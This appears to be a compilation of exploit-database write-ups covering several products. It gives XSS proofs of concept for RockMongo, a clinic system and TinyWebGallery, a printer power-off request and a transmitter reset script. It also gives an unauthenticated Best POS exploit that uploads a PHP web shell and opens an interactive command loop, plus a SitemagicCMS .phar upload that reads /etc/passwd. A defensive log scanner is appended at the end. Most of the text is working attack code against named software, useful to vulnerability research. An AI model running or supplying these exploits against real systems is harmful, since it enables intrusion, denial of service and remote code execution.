RockMongo v1.1.7 does not sufficiently encode user-controlled inputs, resulting in a stored and reflected Cross-Site Scripting (XSS) vulnerability via index.php, in multiple parameters.

Proof of concept:

Stored:

POST https://localhost/mongo/index.php?action=db.newCollection&db=local HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0

Reflected:

https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log

https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E

https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=login.index&host=0
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3

POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.command&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json

POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.execute&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
HireHackking
# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/medical_records_view.php, in the FirstRecord parameter, GET and POST request.

2. Proof of Concept

GET:

http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:

POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"

DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"

1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"


-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"


-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"


-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"


-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"


-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /clinic/patients_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

And Reflected Cross-Site Scripting (XSS) too.

# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/events_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2 does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via /clinic/disease_symptoms_view.php, in the FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
HireHackking

Epson Stylus SX510W Printer Remote Power Off - Denial of Service

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link : https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent to the server in a row ("/PRESENTATION/HTML/TOP/INDEX.HTML"), causing it to shut down.

2. Proof of Concept

Request:

curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This product version is deprecated.
HireHackking

TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)

#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>

Request :

POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save

5. Go to http://localhost/twg25/index.php
HireHackking

Screen SFT DAB 600/C - Authentication Bypass Reset Board Config

#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT + '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
''' + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT + '''
ZSL and the Producers insist that no one submit any exploits of themselfs
or others performing any dangerous activities. We will not open or view them.
''' + Style.RESET_ALL)

s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
e = '/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber--',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'deviceManagement',
     'ssbtObj': {
         'reset': 'true'
     }
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
    exit(-1)
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux

import sys
import requests
import subprocess
import time

if len(sys.argv) < 2:
    print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
    print("Example: %s 192.168.106.130" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"


def brute_force_timestamp(timestamp_prev, ip):
    # The application stores the upload as <unix timestamp>_<filename>;
    # guess timestamps around the one recorded just before the upload.
    progress = 0
    webshell = None
    for i in range(20):
        for j in range(0, 1000, 20):
            timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
            url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
            response = requests.get(url)
            if response.status_code == 200:
                webshell = url
                break
            progress += 1
            print(f"Attempt {progress}/400", end="\r")
            time.sleep(0.1)
            if progress >= 400:
                break
        if webshell or progress >= 400:
            break
    if webshell:
        print("\033[92m[+] Webshell found:", webshell, "\033[0m")
    else:
        print("\033[91m[-] Webshell not found\033[0m")
    return webshell


def get_unix_timestamp():
    timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
    return int(timestamp)


def extract_output(response_text):
    # Command output is echoed between the <pre> tags of the uploaded page
    start_tag = "<pre>"
    end_tag = "</pre>"
    start_index = response_text.find(start_tag)
    end_index = response_text.find(end_tag)
    if start_index != -1 and end_index != -1 and start_index < end_index:
        output = response_text[start_index + len(start_tag):end_index]
        return output.strip()
    return None


def code_execution(webshell):
    if not webshell:
        print("\033[91mWebshell URI not provided\033[0m")
        return
    while True:
        command = input("Enter command to execute (or 'exit' to quit): ")
        if command == 'exit':
            break
        url = webshell + f"?cmd={command}"
        response = requests.get(url)
        output = extract_output(response.text)
        if output:
            print("\033[93m[+] Output:\033[0m")
            print(output)
        else:
            print("\033[91m[-] No output received\033[0m")


# Hand-built multipart body for the unauthenticated save_settings upload
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"

test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"

test@gmail.com
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"

9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"

test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''

headers = {
    'Host': f"{ip}",
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
    'Content-Length': str(len(data)),
    'Connection': 'close'
}

timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)

if response.status_code == 200 and response.text == '1':
    print("[+] Timestamp: %s" % timestamp_prev)
    print("\033[92m[+] Successfully uploaded shell! Unauthenticated! \033[0m")
    webshell = brute_force_timestamp(timestamp_prev, ip)
    code_execution(webshell)
else:
    print("Did not work")

SitemagicCMS 4.4.3 - Remote Code Execution (RCE)

#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================

Steps:
1. Go to Content, then Files.
2. Upload a file named shell.phar whose content is <?php echo system("cat /etc/passwd"); ?>
   (the .phar extension is accepted by the upload filter and executed as PHP by the server).
3. Open http://localhost/SitemagicCMS/files/images/shell.phar

Payload: <?php echo system("cat /etc/passwd"); ?>

PoC request:

POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd'); ?>
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"


------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"

60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
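As an added defensive example (not part of any of the write-ups above, and not code from the affected projects), the following Python scans web server access logs for the two traces that the Best POS and SitemagicCMS entries leave behind: a server-side script (.php/.phar/.phtml) being served from an upload directory, and a burst of 404s guessing <timestamp>_*.php filenames. The log format, the upload directories, the threshold and the sample log lines are this example's own assumptions.

```python
import re
from collections import defaultdict

# Combined access-log format; regex and thresholds are this example's assumptions.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')
# Upload directories named in the two write-ups, and server-side script extensions.
UPLOAD_DIRS = ("/kruxton/assets/uploads/", "/SitemagicCMS/files/")
SCRIPT_EXT = re.compile(r'\.(php\d?|phar|phtml)(\?|$)', re.IGNORECASE)
PROBE_RE = re.compile(r'/\d{10}_[^/]+\.php$')  # <unix-timestamp>_<name>.php guesses
PROBE_THRESHOLD = 5                              # 404s from one IP before alerting

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_abuse(lines):
    """Return alerts for scripts served from upload dirs and timestamp-guessing bursts."""
    alerts, probes = [], defaultdict(int)
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        path, status = rec["path"], int(rec["status"])
        if not path.startswith(UPLOAD_DIRS) or not SCRIPT_EXT.search(path):
            continue  # static assets in upload dirs are expected; scripts are not
        if status == 200:
            alerts.append(f"script served from upload dir: {rec['ip']} {path}")
        elif status == 404 and PROBE_RE.search(path.split("?")[0]):
            probes[rec["ip"]] += 1
    for ip, n in probes.items():
        if n >= PROBE_THRESHOLD:
            alerts.append(f"timestamp brute-force: {ip} made {n} 404 probes for <ts>_*.php")
    return alerts

# Constructed sample log: POS upload, six name guesses, the hit, a .phar fetch, a benign image.
_PROBE = ('10.0.0.5 - - [15/May/2023:10:01:0{s} +0000] "GET /kruxton/assets/uploads/'
          '{ts}_shell.php HTTP/1.1" 404 196 "-" "python-requests/2.28"')
SAMPLE_LOG = [
    '10.0.0.5 - - [15/May/2023:10:01:00 +0000] "POST /kruxton/ajax.php?action=save_settings HTTP/1.1" 200 1 "-" "python-requests/2.28"',
] + [_PROBE.format(s=i, ts=1684144860 + i) for i in range(6)] + [
    '10.0.0.5 - - [15/May/2023:10:01:07 +0000] "GET /kruxton/assets/uploads/1684144865_shell.php?cmd=id HTTP/1.1" 200 412 "-" "python-requests/2.28"',
    '10.0.0.9 - - [15/May/2023:11:20:00 +0000] "GET /SitemagicCMS/files/images/shell.phar HTTP/1.1" 200 1810 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [15/May/2023:11:21:00 +0000] "GET /SitemagicCMS/files/images/logo.png HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for alert in find_upload_abuse(SAMPLE_LOG):
        print(alert)
```

The durable fix on the application side is the same in both cases: an extension allowlist that rejects every PHP-executable extension (including .phar), a randomly generated stored filename, and an upload directory from which the web server refuses to execute scripts.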